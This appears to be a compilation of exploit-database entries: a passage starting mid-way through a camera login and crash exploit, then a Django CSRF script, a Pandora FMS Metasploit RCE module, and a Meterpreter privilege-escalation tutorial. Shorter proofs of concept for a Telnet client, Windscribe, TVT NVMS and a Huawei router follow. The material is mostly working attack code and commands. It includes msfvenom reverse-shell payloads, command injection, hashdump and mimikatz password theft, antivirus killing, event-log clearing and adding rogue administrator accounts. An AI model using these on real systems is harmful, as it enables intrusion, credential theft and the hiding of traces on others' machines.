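    d = hashlib.md5(password).digest()
    out = []
    for i in range(8):
        n = (d[2 * i] + d[2 * i + 1]) % 0x3E
        n += 61 if n > 35 else 55 if n > 9 else 0x30   # a-z, A-Z, 0-9
        out.append(chr(n))
    return "".join(out)


def parse_header(header: bytes):
    """Return (payload_length, session_id); reject malformed frames."""
    if len(header) != HEADER_LEN:
        raise ValueError("header must be 32 bytes")
    payload_len = struct.unpack_from("<I", header, 4)[0]
    if payload_len > MAX_PAYLOAD:
        raise ValueError("implausible payload length %d" % payload_len)
    return payload_len, struct.unpack_from("<I", header, 16)[0]


def parse_challenge(payload: bytes):
    m = CHALLENGE_RE.search(payload)
    if not m:
        raise ValueError("no Realm/Random challenge in payload")
    return m.group(1).decode(), m.group(2).decode()


def old_style_login() -> bytes:
    # legacy login with blank hashes; newer firmware answers with a challenge
    return b"\xa0\x05\x00\x60" + b"\x00" * 20 + b"\x05\x02\x00\x01\x00\x00\xa1\xaa"


def _md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest().upper()


def challenge_response(username: str, password: str, realm: str, random: str) -> bytes:
    """Length field is computed; the PoC's hard-coded 0x47 only fits 'admin'."""
    realm_hash = _md5hex("%s:%s:%s" % (username, realm, password))
    random_hash = _md5hex("%s:%s:%s" % (username, random, realm_hash))
    final_hash = _md5hex("%s:%s:%s" % (username, random, sofia_hash(password.encode())))
    body = ("%s&&%s%s" % (username, random_hash, final_hash)).encode()
    header = (b"\xa0\x05\x00\x60" + struct.pack("<I", len(body)) + b"\x00" * 16
              + b"\x05\x02\x00\x08\x00\x00\xa1\xaa")
    return header + body


def firmware_request(protocol_len: int = 0x300) -> bytes:
    """The crashing request: an over-long 'Protocol:' value (CVE-2020-5735)."""
    command = b"Protocol: " + b"a" * protocol_len + b"\r\n"
    return (b"\x62\x00\x00\x00" + struct.pack("<I", len(command))
            + b"\x04\x00\x00\x00" + b"\x00" * 20 + command)


def recv_frame(sock):
    payload_len, session_id = parse_header(sock.recv(HEADER_LEN))
    payload = sock.recv(payload_len) if payload_len else b""
    if len(payload) != payload_len:
        raise ValueError("short payload")
    return session_id, payload


def login(sock, username: str, password: str) -> int:
    """Run the exchange on a connected socket; a session id of 0 means failure."""
    sock.sendall(old_style_login())
    _, challenge = recv_frame(sock)
    realm, random = parse_challenge(challenge)
    sock.sendall(challenge_response(username, password, realm, random))
    session_id, _ = recv_frame(sock)
    return session_id


class FakeCamera:
    """Constructed stand-in: challenges a legacy login, then grants session
    0x1234 to any well-formed challenge response (hashes are not verified)."""
    def __init__(self):
        self.buf, self.session = b"", 0x1234

    def sendall(self, data: bytes) -> None:
        length, _ = parse_header(data[:HEADER_LEN])
        body = data[HEADER_LEN:HEADER_LEN + length]
        if data[27] == 0x01:                        # legacy login -> challenge
            reply = b"Realm:Login to 1234\r\nRandom:5678\r\n"
            self.buf = b"\xb0\x00\x00\x00" + struct.pack("<I", len(reply)) + b"\x00" * 24 + reply
        elif data[27] == 0x08 and b"&&" in body:    # challenge response -> session id
            self.buf = b"\xb0\x00\x00\x00" + b"\x00" * 12 + struct.pack("<I", self.session) + b"\x00" * 12
        else:                                       # any other command: empty reply
            self.buf = b"\x00" * HEADER_LEN

    def recv(self, n: int) -> bytes:
        out, self.buf = self.buf[:n], self.buf[n:]
        return out
```

Against a real device the same functions run over `socket.create_connection((ip, 37777))`: `login()` returns the session id, and after `sock.sendall(firmware_request())` the PoC's crash check is simply whether the next `recv_frame()` returns anything at all.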
-
Django 3.0 - Cross-Site Request Forgery Token Bypass
# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass
# Date: 2020-04-08
# Exploit Author: Spad Security Group
# Vendor Homepage: https://www.djangoproject.com/
# Software Link: https://pypi.org/project/Django/
# Version: 3.0 =<
# Tested on: windows 10
# Language: python3.8
# t.me/SpadSec
# Spad Security Group
#
# Note: the script fetches the login form, reads the csrfmiddlewaretoken it
# contains and submits it back together with the same session cookies. That
# is the ordinary first-party flow a browser performs; it does not defeat
# the CSRF check for a request that originates from another site.

from requests import Session
import sys
from bs4 import BeautifulSoup
from time import sleep
from colorama import Fore, Style
from random import choice
from os import name, system

colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW]


def cleaner():
    if name == "nt":
        system("cls")
    else:
        system("clear")


def logo_printer():
    cleaner()
    logo = r""" \_______/ `.,-'\_____/`-.,' /`..'\ _ /`.,'\ / /`.,' `.,'\ \ /__/__/ \__\__\__ \ \ \ / / / \ \,'`._,'`./ / \,'`./___\,'`./ ,'`-./_____\,-'`. / \ """
    _logo_enumer = 0
    for char in logo:
        sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}")
        sys.stdout.flush()
        _logo_enumer += 1
        sleep(0.005)
    print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec")


class DjangoCsrfMiddleWareBypass:
    def __init__(self, url: str, username: str, password: str):
        self.url = url
        self.username = username
        self.password = password
        logo_printer()
        self.cookies = {}
        self.session = Session()
        self.bypass()

    def spad_printer(self, string):
        print("\n")
        for char in string:
            sys.stdout.write(char)
            sys.stdout.flush()
            sleep(0.05)

    def bypass(self):
        global colors
        # GET the login page: this sets the csrftoken cookie and embeds the form token
        _conn = self.session.get(self.url)
        self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}")
        self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...")
        for key, value in _conn.cookies.items():
            self.cookies[key] = value
        self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!")
        # read the csrfmiddlewaretoken hidden input out of the form
        soup = BeautifulSoup(_conn.text, "lxml")
        csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
        self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}")
        # POST the credentials with the token and the cookies from the same session
        login = self.session.post(self.url,
                                  data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password},
                                  cookies=self.cookies)
        if len(login.history) >= 2:
            if login.history[1].is_redirect:
                self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in")
            else:
                self.spad_printer("[-] Error")
        else:
            if login.history:
                if login.history[0].is_redirect:
                    self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}")
                    for key, value in self.session.cookies.items():
                        self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}")
                else:
                    self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
            else:
                self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")


if __name__ == "__main__":
    try:
        url = sys.argv[1]
        username = sys.argv[2]
        password = sys.argv[3]
        DjangoCsrfMiddleWareBypass(url, username, password)
    except IndexError:
        logo_printer()
        for char in f"[!] python {sys.argv[0]} http://google.com username password":
            sys.stdout.write(char)
            sys.stdout.flush()
            sleep(0.05)
-
Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Pandora FMS Ping Authenticated Remote Code Execution',
      'Description'    => %q{
        This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.
        net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute
        arbitrary OS commands.
      },
      'Author'         => [
        'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module
      ],
      'DisclosureDate' => '2020-03-09',
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Privileged'     => false,
      'Targets'        => [
        ['Automatic Target', {}]
      ],
      'DefaultOptions' => {
        'Payload' => 'linux/x86/meterpreter/reverse_tcp'
      },
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
        OptString.new('USERNAME', [true, 'The username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri, 'index.php')
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.body =~ /Pandora/i
      return CheckCode::Safe
    end

    pandora_version = res.body.scan(/<div id="ver_num">v(.*?)<\/div>/).flatten.first
    version = Gem::Version.new(pandora_version)
    print_status("Pandora FMS version #{version}") if version

    if Gem::Version.new(version) <= Gem::Version.new('7.0NG')
      return Exploit::CheckCode::Appears
    end

    CheckCode::Detected
  end

  def authenticate
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri, 'index.php'),
      'vars_get'  => {
        'login' => '1'
      },
      'vars_post' => {
        'nick'         => datastore['USERNAME'],
        'pass'         => datastore['PASSWORD'],
        'login_button' => 'Login'
      }
    })

    return auth_succeeded?(res)
  end

  def auth_succeeded?(res)
    unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
      print_error('Authentication failed!')
      return false
    end

    print_good('Successfully authenticated')
    print_status('Attempting to retrieve session cookie')
    @cookie = res.get_cookies

    unless @cookie.include?('PHPSESSID')
      print_error('Error retrieving cookie!')
      return false
    end

    print_good("Successfully retrieved session cookie: #{@cookie}")
    true
  end

  def exploit
    print_status('Exploiting...')
    execute_cmdstager(flavor: :wget, nospace: true)
  end

  def execute_command(cmd, opts = {})
    print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})")
    auth = authenticate
    unless auth
      fail_with Failure::NoAccess, 'Please provide a valid username and password.'
    end

    # The network_tools extension passes select_ips to the ping command
    # unsanitised; a leading ';' terminates it and runs cmd. Agent ids are
    # guessed from 1 to 10 because the extension is reached per agent.
    id_agente = 1
    while !session_created? && id_agente <= 10
      send_request_cgi({
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri, 'index.php'),
        'cookie'    => @cookie,
        'vars_get'  => {
          'sec'          => 'estado',
          'sec2'         => 'operation/agentes/ver_agente',
          'tab'          => 'extension',
          'id_agente'    => "#{id_agente}",
          'id_extension' => 'network_tools'
        },
        'vars_post' => {
          'operation'  => '2',
          'select_ips' => ";#{cmd}",
          'community'  => 'public',
          'submit'     => 'Execute'
        }
      })
      id_agente += 1
    end
  end
end
-
Title: Meterpreter Privilege Escalation in Detail
0x01 Meterpreter automatic privilege escalation

1. Generate the backdoor program

Run the following command directly on the Kali command line to obtain a reverse-connecting trojan for Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.11.2 LPORT=4444 -f exe -o /tmp/hack.exe

Here the payload of the generated trojan is windows/meterpreter/reverse_tcp, the listener it connects back to is 172.16.11.2 on port 4444, the output format is exe, and the file is saved as /tmp/hack.exe.

2. Start the listener

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.11.2
show options

Enter the exploit command to start the module we just configured for listening.

3. Upload and run the trojan

Upload and run the trojan through a webshell. Here we assume that a webshell on the target machine was obtained through a series of penetration tests. Through the webshell's file-management function we upload hack.exe; its absolute path is C:\www\hack.exe. Then we try to run it through the webshell's command-execution function:

C://www/hack.exe    // forward slashes are used in the path here to avoid character escaping

After execution the trojan process is visible in the process list. Switching to the Metasploit window with the listener started earlier, the target machine has connected back.

4. Meterpreter basic privilege escalation

Meterpreter is the killer weapon of the Metasploit framework. It is generally used as the post-exploitation payload after an overflow exploit: once the exploit fires, it returns a control channel. In the Meterpreter session, run the following command directly and MSF automatically selects a suitable method to raise the current privileges:

getsystem

The output shows that automatic privilege escalation in the Meterpreter session succeeded. At this point, if the target machine belongs to a domain and a process is running as a domain administrator, we can steal the domain administrator's token from that process's PID and do interesting things (such as adding a domain account and putting it in the domain admins group). In the Meterpreter session, run ps to list the target's current processes. Assume one of them is running as a domain administrator; its PID is in the first column (here, in fact, we pick a process running as SYSTEM). The PID is 2584. Run the following to steal that process's token:

steal_token 2584

This method is usually used to steal a domain administrator's token. Run getuid and the user is reported as NT AUTHORITY\SYSTEM, which means we already hold SYSTEM privileges. Next run the following command to try to dump the password hashes from the SAM database:

hashdump

On Windows 2008, if getsystem and hashdump throw exceptions, you need to migrate into a process running as SYSTEM; this is covered later. Run the shell command to get a cmd shell inside the Meterpreter session; this cmd shell of course inherits the Meterpreter session's SYSTEM privileges. Run the following cmd commands to add an account named test on the target machine:

net user test v5est0r /add
net localgroup administrators test /add

Next, use the Meterpreter session to open the target's Remote Desktop service on port 3389 (per actual testing this module only supports Windows 2003 hosts):

run getgui -e

Finally, open a new terminal window and run the following command to connect to the target's remote desktop with rdesktop:

rdesktop -u test -p v5est0r 172.16.12.2

-u: specify the username
-p: specify the password

0x02 Privilege escalation with an overflow vulnerability module

Generally the privileges of the web service behind a webshell are very low, typically an ordinary user's, although servers have also been encountered where commands already run with the highest system privileges; in that case a user is simply added directly. When privileges are low they have to be raised to SYSTEM, the highest privilege on Windows. Hackers usually use an EXP program to escalate, which is covered in later experiments. Of course, calling an MSF overflow vulnerability module to escalate is also a good method.

Buffer overflow: a buffer is a contiguous block of memory that a program requests from the computer to hold data of a certain type. A buffer overflow is a common and very harmful attack method: by writing more content than the buffer can hold, the buffer overflows, corrupting the program's stack and diverting the program to execute other instructions, which achieves the attacker's goal. More seriously, buffer overflow attacks make up a large share of remote network attacks and can give an anonymous Internet user the chance to gain partial or complete control of a host. Because this type of attack lets anyone take control of a host, it represents a very serious class of security threat.

1. Call the vulnerability module

Refer to the Meterpreter automatic privilege escalation experiment above to obtain a usable Meterpreter session on the target. Then enter the following command in the Meterpreter session:

background    // moves the current Meterpreter session to the background

Next run the following command on the MSF command line to search for usable Microsoft vulnerability modules from 2015:

search ms15    // search for vulnerability modules by keyword

Many vulnerability modules are found. We choose MS15-051 to escalate privileges and run:

use exploit/windows/local/ms15_051_client_copy_image

This local module needs to be told which session to run the escalation against. Run the following command to specify session 1:

set session 1    // the ID of the session connected to the backdoor; there is only one session here, so it is 1

2. Run the overflow

Run the following command directly to invoke the vulnerability module and escalate:

exploit

The returned information shows that no new session was created, but that SYSTEM privileges were obtained: when SYSTEM privileges are not yet available it escalates into a SYSTEM process and prints that process's PID. Generally, even when escalation succeeded, returning to the session with the following command still shows the original privileges from getuid:

sessions -i 1

Run ps to view the processes and, following the prompt, find the process with the PID above. Here we picked a process with SYSTEM privileges at random; its PID is 3240. Then use the migrate command to migrate the current session into the specified process ID:

migrate 3240

As the output shows, the process migration succeeded. Run getuid again and you can see that SYSTEM privileges are now available.

0x03 Follow-up operations after privilege escalation

1. Basic information collection

Detect whether the target machine is a virtual machine. Run the following in the Meterpreter session:

run post/windows/gather/checkvm    # whether it is a VM; the result is not accurate here and the module code needs improvement

Kill the antivirus software the target host is running through Meterpreter's killav script. Run the following in the Meterpreter session:

run killav

This module also needs improvement: the process it killed here was cmd. Sometimes it is useful though. To obtain the installed software, run the following in the Meterpreter session:

run post/windows/gather/enum_applications    # get installed software information

To obtain the target machine's recent file operations, run the following in the Meterpreter session:

run post/windows/gather/dumplinks    # recent file operations

2. Read hashes and plaintext passwords

To obtain the user hashes of the target system, run the following in the Meterpreter session:

run post/windows/gather/smart_hashdump

The module's output is as follows:

[*] Running module against TESTINGHASHES
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /home/croxy/.msf4/loot/20155092922525044_default_10.0.2.15_windows.hashes_407551.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] croxy:"whoareyou "
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::
[+] test:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::

As above, we obtained the hashes of the local accounts. To obtain plaintext passwords, the mimikatz module must be loaded first. Run the following in the Meterpreter session:

load mimikatz

Confirm that the current process has SYSTEM privileges, then run:

msv

The following is returned:

[+] Running as SYSTEM
[*] Retrieving msv credentials

which shows that the current process has SYSTEM privileges. Then run the following command to export the plaintext passwords of the system users:

kerberos

The plaintext passwords are exported successfully; the test user's password is v5est0r. Run the following command to export the system user hashes through the mimikatz command line:

meterpreter > mimikatz_command -f samdump::hashes

Run the following command to export the system users' plaintext passwords through the mimikatz command line:

mimikatz_command -f sekurlsa::searchPasswords

3. Clean up traces

Run the following command:

meterpreter > clearev

The output shows that this command clears history records from three logs: Application, System and Security. MSF also provides the timestomp module for changing file times, but in actual testing it is of little use; it is covered here only for general knowledge:

meterpreter > timestomp C:\\www -c '09/09/1980 12:12:34'    modify the file creation time
meterpreter > timestomp C:\\jzking121.txt -m '01/01/1991 12:12:34'    modify the file modification time
meterpreter > timestomp C:\\jzking121.txt -f C:\\rhdsetup.log    copy rhdsetup.log's time attributes onto jzking121.txt

In actual testing there are occasional errors; you can also log in to the server and change the file times by hand.

0x04 AlwaysInstallElevated privilege escalation

1. Generate an MSI installer file

After obtaining a Meterpreter session, suppose SYSTEM privileges cannot be obtained with the conventional methods; AlwaysInstallElevated may then offer hope. AlwaysInstallElevated is a Microsoft setting that lets unprivileged users run installer files (MSI) with SYSTEM privileges. Granting this carries a definite security risk, because when it is enabled the following two registry values are set to 1:

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001

The simplest way to query these two values is with cmd. First run shell in the Meterpreter session to switch to a cmd shell, then run the following under the cmd shell to query the registry values above:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Here the query reports an error. Note: if the command fails with something like "ERROR: The system was unable to find the specified registry key or value", it may be because AlwaysInstallElevated is not defined in group policy, so the related registry key does not exist. Both values must be 1 for the technique to work. Assuming AlwaysInstallElevated is enabled, msfvenom can generate an MSI installer that adds an administrator user on the target machine:

msfvenom -p windows/adduser USER=msi PASS=P@ssword123! -f msi -o /tmp/add.msi    // the user added here is msi with the password P@ssword123!

As the output shows, the MSI file was generated successfully at /tmp/add.msi.

2. Run the MSI file to escalate

Next, upload the installer to the target machine as C:\add.msi:

upload /tmp/add.msi C:\\add.msi

Once the newly generated MSI file is on the target, install it with the Windows command-line msiexec tool (run shell first to switch to a cmd shell):

shell
msiexec /quiet /qn /i C:\add.msi

The msiexec parameters are:

/quiet: quiet mode, no messages to the user during installation
/qn: no GUI
/i: install the package

After the installer runs, the newly created administrator user can be found on the target machine. Run the following under the cmd shell to list the members of the administrators group:

net localgroup administrators
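The registry check in the AlwaysInstallElevated section above, as an added example that is not part of the original tutorial: Python code that parses the output of the two `reg query` commands (HKCU and HKLM) and reports the setting as usable only when both values are 1. The "unable to find the specified registry key or value" error the tutorial warns about is treated as "not enabled" rather than as a parse failure. The sample outputs are constructed; `query_live()` assumes `reg.exe` is on PATH on a Windows host.

```python
"""AlwaysInstallElevated decision from `reg query` output. Added example, not
part of the original tutorial; sample outputs are constructed."""
import re
import subprocess

KEY = r"\Software\Policies\Microsoft\Windows\Installer"
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$", re.M)
MISSING_RE = re.compile(r"unable to find the specified registry key or value", re.I)


def parse_reg_query(output: str):
    """Return the DWORD as an int, or None when the key or value does not exist."""
    if MISSING_RE.search(output):
        return None
    m = VALUE_RE.search(output)
    if m is None:
        raise ValueError("unrecognised reg query output: %r" % output[:80])
    return int(m.group(1), 16)


def always_install_elevated(hkcu_output: str, hklm_output: str) -> bool:
    """Both policy values must be exactly 1; a missing key, 0 or any other
    value means msiexec will not install the package with SYSTEM rights."""
    return parse_reg_query(hkcu_output) == 1 and parse_reg_query(hklm_output) == 1


def query_live() -> bool:
    """Run the two queries on a Windows host (assumes reg.exe on PATH)."""
    outputs = []
    for hive in ("HKCU", "HKLM"):
        proc = subprocess.run(["reg", "query", hive + KEY, "/v", "AlwaysInstallElevated"],
                              capture_output=True, text=True)
        outputs.append(proc.stdout + proc.stderr)   # reg.exe prints the error on stderr
    return always_install_elevated(*outputs)


# constructed samples of what reg.exe prints in each case
SAMPLE_ENABLED = """
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_DISABLED = """
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x0
"""
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"
```

Run `query_live()` from the cmd shell obtained through Meterpreter; only a `True` result makes the `windows/adduser` MSI worth uploading.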
-
AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-05-02
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
# 3.- Open AbsoluteTelnet
# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
# 5.- In "username" field paste Clipboard
# 6.- Select "OK"
# 7.- Crashed

buffer = "\x41" * 1000
f = open("absolutetelnet_username_SSH1.txt", "w")
f.write(buffer)
f.close()
-
Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-04-10
# Exploit Author: MgThuraMoeMyint
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Windows 10, version 1909

In Windscribe v1.83 there is a service, WindscribeService, whose configuration every authenticated user can modify. Its BINARY_PATH_NAME is also unquoted and contains spaces, but the steps below rely on the weak service ACL rather than on the unquoted path; the ACL can be confirmed with `sc sdshow WindscribeService`, looking for an ACE that grants DC (SERVICE_CHANGE_CONFIG) to Authenticated Users or Users.

C:\Users\mgthura>sc qc WindscribeService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WindscribeService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Windscribe\WindscribeService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WindscribeService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

The service runs as LocalSystem, so if the BINARY_PATH_NAME parameter can be modified it can be pointed at any command, which the Service Control Manager will then run as SYSTEM. I change binary_path_name to a command that adds a user to the administrators group:

C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup administrators pentest /add"
[SC] ChangeServiceConfig SUCCESS

C:\Users\mgthura>sc stop WindscribeService

SERVICE_NAME: WindscribeService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x4
        WAIT_HINT          : 0x0

C:\Users\mgthura>sc start WindscribeService
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Restarting the service makes it fail, because the binary path no longer points at a real service executable (net.exe never reports its status to the SCM, hence error 1053). The command is nevertheless executed as SYSTEM, and the user is added to the local administrators group.
-
TVT NVMS 1000 - Directory Traversal
# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085

import sys
import requests
import time

if len(sys.argv) != 4:
    print(" ")
    print("Usage : python exploit.py url filename outputname")
    print("Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini")
    print(" ")
else:
    # enough "../" to reach the drive root from wherever the web root lives
    traversal = "../../../../../../../../../../../../../"
    filename = sys.argv[2]
    url = sys.argv[1] + traversal + filename
    outputname = sys.argv[3]
    content = requests.get(url)
    if content.status_code == 200:
        print(" ")
        print("Directory Traversal Succeeded")
        time.sleep(3)
        print(" ")
        print("Saving Output")
        # write the file straight out (replaces the original touch + "r+" dance)
        with open(outputname, "w") as output_write:
            output_write.write(content.text)
    else:
        print("Host not vulnerable to Directory Traversal!")
-
Huawei HG630 2 Router - Authentication Bypass
# Title: Huawei HG630 2 Router - Authentication Bypass
# Date: 2020-04-13
# Author: Eslam Medhat
# Vendor Homepage: www.huawei.com
# Version: HG630 V2
# HardwareVersion: VER.B
# CVE: N/A

#POC:

The default password of this router is the last 8 characters of the device's serial number, which is printed on the back of the device. An attacker can leak the serial number via the web application's API as follows:

************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm

************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Fri, 01 Jan 2010 09:14:47 GMT
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141

while(1); /*{"DeviceName":"HG630 V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/

You can use that serial number to log in to the router: the password is its last 8 characters (here 15905395), provided the default was never changed.

#Reference: https://www.youtube.com/watch?v=vOrIL7L_cVc
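The serial-to-password step from the advisory above, as an added example (not the advisory's code): the router wraps its JSON in a `while(1); /* ... */` anti-hijacking guard, so the response has to be unwrapped before it can be decoded, and the rule stated above (default password = last 8 characters of the serial) is then applied. SAMPLE_BODY is the response body shown in the advisory; `fetch_deviceinfo()` is a helper that assumes the GET answers without a valid session cookie, as the advisory implies but the capture above (which carries a cookie) does not prove.

```python
"""HG630 V2 deviceinfo: unwrap the JSON guard and derive the default password.
Added example, not the advisory's code. SAMPLE_BODY is the advisory's response."""
import json
import urllib.request

SAMPLE_BODY = ('while(1); /*{"DeviceName":"HG630 V2","SerialNumber":"T5D7S18815905395",'
               '"ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/')
GUARD = "while(1);"


def parse_guarded_json(body: str) -> dict:
    """Strip the `while(1); /* ... */` wrapper and decode the JSON object inside.
    A plain JSON body (no guard) is accepted too."""
    text = body.strip()
    if text.startswith(GUARD):
        text = text[len(GUARD):].lstrip()
    if text.startswith("/*") and text.endswith("*/"):
        text = text[2:-2]
    return json.loads(text)


def default_password(deviceinfo: dict) -> str:
    """Last 8 characters of the serial number, the factory default per the advisory."""
    serial = deviceinfo.get("SerialNumber", "")
    if len(serial) < 8:
        raise ValueError("serial number missing or shorter than 8 characters")
    return serial[-8:]


def fetch_deviceinfo(host: str = "192.168.1.1") -> dict:
    """Helper for a live target; assumes the endpoint answers an unauthenticated GET."""
    req = urllib.request.Request(
        "http://%s/api/system/deviceinfo" % host,
        headers={"X-Requested-With": "XMLHttpRequest", "Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return parse_guarded_json(resp.read().decode("utf-8", "replace"))
```

`default_password(fetch_deviceinfo())` gives the candidate password; if the login fails, the owner changed it and the leak only yields the serial number.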
-
Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
